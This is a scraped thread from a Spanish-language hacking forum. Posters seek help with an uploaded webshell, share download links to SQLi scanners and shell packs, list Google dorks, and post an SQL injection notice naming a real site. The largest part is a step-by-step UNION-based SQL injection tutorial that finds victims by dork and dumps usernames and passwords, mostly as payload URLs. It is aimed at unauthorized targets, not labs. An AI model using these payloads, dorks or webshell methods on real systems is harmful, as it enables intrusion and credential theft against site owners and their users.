Mensajes

Tengo acceso a un servidor en el que puedo subir una webshell, pero una vez subida no la encuentro, he probado nikto y dirbuster.

Alguien puede ayudarme? la idea es crear un videotuto

Tengo una duda sobre un posible fallo en una web.
El caso es que trasteando, cuando modificas la url, de esta manera

www.XXXXXXXX.com/asdf

me devuelve la pagina mal cargada, con este error:

An error occurred
Page not found
Exception information:

Message: Invalid controller specified (asdf)
Stack trace:

#0 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#1 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()
#2 /var/www/vhosts/XXXXXXXXX.com/httpdocs/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()
#3 /var/www/vhosts/XXXXXXXX.com/httpdocs/index.php(71): Zend_Application->run()
#4 {main} 

Request Parameters:

array (
  'controller' => 'asdf',
  'action' => 'index',
  'module' => 'default',

La pregunta es si alguien sabe, si esto es una falla explotable?

no siempre se pide, tambien se da, asi que un regalo para todos.
lo encontre en "pastebin"

SQLI SCANNER PACK : http://www.mediafire.com/download.php?fer74n4rlxwf3uc
MD5 tools pack : http://www.mediafire.com/download.php?f14s7tpc9zyos7s
ADMIN FINDR : http://www.mediafire.com/download.php?ye0fx80wzjni1z9
SQLI TUTORIAL PACK : http://www.mediafire.com/download.php?mup5itjeu391fcy
DORKS PACK : http://www.mediafire.com/download.php?c8w4chtjcak4i7y
SHELLS PACK : http://www.mediafire.com/download.php?ce6ka8vcd875nog
MISC UTILITIE PACK : http://www.mediafire.com/download.php?eo8j5w3zyyv28qp

DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

..... y muchos mas....

fuente:http://forum.insidepro.com/viewtopic.php?t=8225

Los Dork's son peligrosos, eso todos lo sabemos, bueno, pues aqui les dejo un ejemplo de como se pueden usar. La verdad no tinen ninguna ciencia.

En concreto este:

Google search: filetype:ini "Bootstrap.php" (pass|passwd|password|pwd)
Submited: 2011-08-25

http://www.youtube.com/watch?v=KJCnUlv-Xj4

**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******

autor==>ruben_linux
equipo=>ruben_linux

• DORK: "AR SOLUTIONS" inurl:viewnews.php?id=
  
  
• URL: http://bestfan.com/viewnews.php?id=[sqli]
  
  
• EJEMPLO:
  http://bestfan.com/viewnews.php?id=253+and+1=0+1,2,3,4,5,6,7,8,9,10,11,12--
  
  ***********************************************
  ******************ruben_linux******************
  ***********************************************

fuente: http://packetstormsecurity.org/files/view/104643/arsolutions-sql.txt

puedes mostrar toda la cabecera??

method="GET"

Sabes como se comunica un cliente con un servidor,... los metodos "post" y "get"

if (cod.length != 16){

si la longitud es distinta (!=) de 16....

Qué es "var"?

Necesitas algun tuto de programacion... var...iables...?

prueba (Zona 0)

Cual es esa???

[v]

A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió. 

Gracias WarGhost. Ya lo cambie.

Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi

1.- buscamos victima.

inurl:software/categoria.php?

2.- exploit

+and+1=0

3.- buscamos union select

http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+1--

4.- buscamos las tablas

http://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--

5.- buscamos las columnas

http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--

6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.

http://www.xxxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--

vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass

podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.

[youtube=425,350]http://www.youtube.com/watch?v=uuEbGos9Cwg[/youtube]